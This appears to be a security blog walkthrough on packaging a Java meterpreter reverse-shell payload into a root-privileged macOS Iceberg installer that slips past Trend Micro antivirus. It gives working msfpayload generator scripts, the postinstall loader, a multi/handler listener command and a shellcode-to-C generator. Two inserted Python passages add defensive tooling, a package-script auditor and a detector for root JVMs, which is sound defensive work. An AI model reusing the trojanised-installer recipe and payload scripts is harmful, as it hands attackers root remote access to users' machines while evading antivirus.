In the previous articles I described how to install and run 64-bit OSX in KVM (in this example Mountain Lion 10.8.2). Now let's focus on a simple exercise: creating an installer with Iceberg that contains a meterpreter payload which gets executed once the package is installed on the host. I have also installed an antivirus on the OSX guest; according to some online reviews a few products boast high ratings, one of them being Trend Micro Titanium. Also note that I have no firewall set up on the OSX.
There is a previous article describing a very similar approach for an old 32bit 10.6.x OSX here : http://astr0baby.wordpress.com/2012/11/30/hacking-osx-using-metasploit
In this test I have installed Trend Micro Titanium on OSX 10.8.2 and prepared an installer containing a Java meterpreter payload. Here is a simple shell script to make things easier:
#!/bin/bash
clear
echo "************************************************************"
echo " Automatic Java Meterpreter generator - FOR METASPLOIT "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
mkdir ShellCode
./msfpayload java/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R > test.jar
mv test.jar ShellCode
echo "test.jar generated in ShellCode folder..."
So next let's copy test.jar over to the virtualized OSX and load Iceberg. There is a video demonstration at the end that shows the whole process. Setting up Iceberg is very easy; just make sure you have the meterpreter jar file handy and the loader script, which should be as follows:
#!/bin/sh
/usr/bin/java -jar /Applications/Utilities/test.jar
I have chosen /Applications/Utilities/ as the path the jar file gets installed to, and a postupgrade or postinstall script that will load test.jar while the installer runs. Also, while creating the Iceberg installer make sure that “Requires Admin” is checked, otherwise you won't get root privileges. Here are some screenshots:
Once you compile the project, the installer located in /Users/user/Test (or whatever you have called the project) can be executed. I have also created a simple shell script for the Metasploit listener:
#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo " starting the meterpreter listener.."
./msfcli exploit/multi/handler PAYLOAD=java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=$port E
So once we execute the pkg installer a root meterpreter shell pops up. Trend Micro Titanium seems to be happy with it.
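The part of this exercise a defender can act on is that the installer asked for admin rights and shipped a postinstall script that does far more than copy files. Below is an added audit script (my own example, not code from the post or from Iceberg) that inspects a package after it has been expanded with pkgutil --expand Test.pkg /tmp/expanded: it reads the auth attribute from PackageInfo (assumed here to be what the "Requires Admin" checkbox produces), walks the declared install scripts, and flags lines that launch a jar, background a process, fetch from the network or load a launch job. The package tree it builds is a constructed fixture modelled on the installer described above, not the author's actual package.

```python
"""Audit an expanded macOS flat package for privileged install scripts.

Added example, not code from the original post or from Iceberg. It assumes the
.pkg was first expanded with `pkgutil --expand Test.pkg /tmp/expanded`, which
yields a PackageInfo XML file plus a Scripts/ directory. The auth="root"
attribute in PackageInfo is taken to be what Iceberg's "Requires Admin"
checkbox produces (assumption based on the flat-package format); the fixture
built below is constructed for the demo and is not the author's installer.
"""
import os
import re
import shutil
import tempfile
import xml.etree.ElementTree as ET

# Heuristics for install-script lines worth a reviewer's attention (constructed list).
SUSPICIOUS = (
    (r"\bjava\s+-jar\b", "launches a jar from the install script"),
    (r"\b(nohup|setsid)\b|&\s*$", "backgrounds a process that outlives the installer"),
    (r"\b(curl|wget)\b", "fetches content from the network at install time"),
    (r"LaunchDaemons|launchctl\s+load", "installs or loads a persistent launch job"),
)


def audit_expanded_pkg(pkg_dir):
    """Return a dict describing privilege level and flagged script lines."""
    info = ET.parse(os.path.join(pkg_dir, "PackageInfo")).getroot()
    report = {
        "identifier": info.get("identifier"),
        "requires_root": info.get("auth") == "root",
        "install_location": info.get("install-location"),
        "scripts": {},
    }
    scripts = info.find("scripts")
    if scripts is not None:
        for phase in scripts:  # e.g. <preinstall file="./preinstall"/>, <postinstall .../>
            path = os.path.join(pkg_dir, "Scripts", os.path.basename(phase.get("file", "")))
            findings = []
            if os.path.isfile(path):
                with open(path) as fh:
                    for lineno, line in enumerate(fh, 1):
                        for pattern, why in SUSPICIOUS:
                            if re.search(pattern, line):
                                findings.append((lineno, why, line.rstrip()))
            report["scripts"][phase.tag] = findings
    # A root-privileged installer plus a script that does more than copy files is
    # exactly the combination that hands out the root shell in the post above.
    report["risky"] = report["requires_root"] and any(report["scripts"].values())
    return report


def build_fixture():
    """Create a constructed expanded-package tree mirroring the post's installer."""
    d = tempfile.mkdtemp(prefix="pkg-audit-")
    os.mkdir(os.path.join(d, "Scripts"))
    with open(os.path.join(d, "PackageInfo"), "w") as fh:
        fh.write(
            '<?xml version="1.0" encoding="utf-8"?>\n'
            '<pkg-info format-version="2" identifier="com.example.test" '
            'version="1.0" install-location="/" auth="root">\n'
            '  <payload installKBytes="40" numberOfFiles="1"/>\n'
            '  <scripts>\n    <postinstall file="./postinstall"/>\n  </scripts>\n'
            '</pkg-info>\n'
        )
    with open(os.path.join(d, "Scripts", "postinstall"), "w") as fh:
        fh.write("#!/bin/sh\n/usr/bin/java -jar /Applications/Utilities/test.jar\n")
    return d


if __name__ == "__main__":
    fixture = build_fixture()
    try:
        rep = audit_expanded_pkg(fixture)
        print("package:", rep["identifier"], "requires root:", rep["requires_root"])
        for phase, hits in rep["scripts"].items():
            for lineno, why, text in hits:
                print(f"  {phase}:{lineno}: {why}: {text}")
        print("verdict:", "REVIEW BEFORE INSTALLING" if rep["risky"] else "nothing flagged")
    finally:
        shutil.rmtree(fixture)
```

Point audit_expanded_pkg at a real expanded package to use it on something other than the fixture; the script patterns are deliberately simple so that a reviewer reads the flagged lines rather than trusting a verdict, and a package that needs root while carrying any non-trivial script is worth a look regardless of what the antivirus says.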
So the Java meterpreter payload works well; how about native reverse TCP shell payloads for 64-bit OSX? They don't work, as I believe there is some memory execute prevention in the kernel. I have tested it here with the following C source generator:
#!/bin/bash
clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
mkdir ShellCode
./msfpayload osx/x64/shell_reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x64/xor > test.c
mv test.c ShellCode
cd ShellCode
# Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp.c
cat ready.c >> temp.c
echo ";" >> temp.c
echo "int main(void) { ((void (*)())micro)();" >> temp.c
echo "}" >> temp.c
mv temp.c final.c
echo "final.c is ready in ShellCode, please compile it using gcc on OSX"
# Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4
cd ..
Once we copy final.c over to OSX we can compile it with GCC and execute it, but all I get is a bus error:
So we are pretty much stuck with the Java meterpreter payload for 64bit OSX systems.
Interesting Trend Micro Titanium processes on the OSX:
ps aux | grep Trend
user 280 0.4 1.3 713228 26736 ?? Ss 9:19AM 0:20.30 /Applications/TrendMicro.localized/iTIS.app/Contents/MacOS/iTIS -update
root 364 0.0 2.2 652028 45640 ?? Ss 9:20AM 0:21.90 /Library/Application Support/TrendMicro/TmccMac/iCoreService_av -p 61301 -n 61100 /Library/Application Support/TrendMicro/common/lib/libTmAntiMalware.dylib
user 196 0.0 0.5 690412 10752 ?? S 9:13AM 0:01.49 /Library/Application Support/TrendMicro/TmccMac/UIMgmt.app/Contents/MacOS/UIMgmt
root 62 0.0 0.2 617688 3472 ?? Ss 9:11AM 0:06.00 /Library/Application Support/TrendMicro/TmccMac/iCoreService -p 61100 -n 61100 /Library/Application Support/TrendMicro/common/lib/libnamingService.dylib /Library/Application Support/TrendMicro/common/lib/libtaskManager.dylib /Library/Application Support/TrendMicro/common/lib/libnotificationService.dylib /Library/Application Support/TrendMicro/common/lib/libTmUpdate.dylib /Library/Application Support/TrendMicro/common/lib/libTmDb.dylib
root 61 0.0 0.2 617520 3912 ?? Ss 9:11AM 0:00.31 /Library/Application Support/TrendMicro/TmccMac/iCoreService_wp -p 61201 -n 61100 /Library/Application Support/TrendMicro/common/lib/libTmProxy.dylib
root 59 0.0 0.2 628928 4128 ?? Ss 9:11AM 0:00.65 /Library/Application Support/TrendMicro/TmccMac/iCoreService -p 61401 -n 61100 /Library/Application Support/TrendMicro/Plug-in/iTISPlugin.framework/iTISPlugin
root 481 0.0 0.0 2433436 0 ?? R 9:41AM 0:00.00 grep Trend
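The antivirus processes above are what the product shows of itself; what it did not show is the root-owned JVM that the postinstall script left running from /Applications/Utilities. As an added example (my own code, not from the post), here is a small parser for ps aux output in the column layout printed above that reports root JVMs whose jar lives outside a set of trusted prefixes. The listing it runs over is constructed: it mixes lines modelled on the Trend Micro output with the java loader an installer like the one in this post would start, and the trusted-prefix list is an assumption standing in for site policy.

```python
"""Flag root-owned Java processes started from non-system jar paths.

Added example; not part of the original post. It parses `ps aux` output in the
column layout shown above (USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME
COMMAND). The sample listing is constructed: it mixes lines modelled on the
Trend Micro output above with the java loader a postinstall like the one in
this post would leave running, so a real listing will differ.
"""
import re

SAMPLE_PS = """\
USER  PID %CPU %MEM  VSZ   RSS   TT  STAT STARTED TIME COMMAND
root   364  0.0  2.2 652028 45640 ??  Ss   9:20AM 0:21.90 /Library/Application Support/TrendMicro/TmccMac/iCoreService_av -p 61301 -n 61100
root   512  0.3  1.1 2501228 23196 ??  S    9:30AM 0:00.45 /usr/bin/java -jar /Applications/Utilities/test.jar
user   530  0.0  0.9 2499140 18232 ??  S    9:31AM 0:00.12 /usr/bin/java -jar /Users/user/Desktop/app.jar
root   601  0.0  0.8 2498100 16440 ??  S    9:32AM 0:00.20 /usr/bin/java -jar /Library/Java/Extensions/vendor-agent.jar
root   481  0.0  0.0 2433436 0     ??  R    9:41AM 0:00.00 grep Trend
"""

# Jar locations where a root-owned JVM is plausibly expected (assumption: site policy).
TRUSTED_JAR_PREFIXES = ("/System/Library/", "/Library/Java/", "/usr/share/")

# Matches "java ... -jar <path>" and captures the jar path.
JAR_RE = re.compile(r"\bjava\b.*?\s-jar\s+(\S+)")


def parse_ps_aux(text):
    """Yield (user, pid, command) tuples from `ps aux` output, skipping the header."""
    for line in text.splitlines():
        fields = line.split(None, 10)  # COMMAND is the 11th field and may contain spaces
        if len(fields) < 11 or not fields[1].isdigit():
            continue  # header line or truncated row
        yield fields[0], int(fields[1]), fields[10]


def find_root_jars(text):
    """Return [(pid, jar_path)] for root JVMs whose jar is outside trusted prefixes."""
    hits = []
    for user, pid, cmd in parse_ps_aux(text):
        m = JAR_RE.search(cmd)
        if not m or user != "root":
            continue
        jar = m.group(1)
        if not jar.startswith(TRUSTED_JAR_PREFIXES):
            hits.append((pid, jar))
    return hits


if __name__ == "__main__":
    for pid, jar in find_root_jars(SAMPLE_PS):
        print(f"root JVM pid {pid} running {jar}: verify the installer that dropped it")
```

Feed it the real output of ps aux (for example via subprocess) to run it against a live system; the jar under /Applications/Utilities is the one that should stand out, since Apple's own utilities there are application bundles rather than jars launched by root.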
And here is the whole process summary in a short video: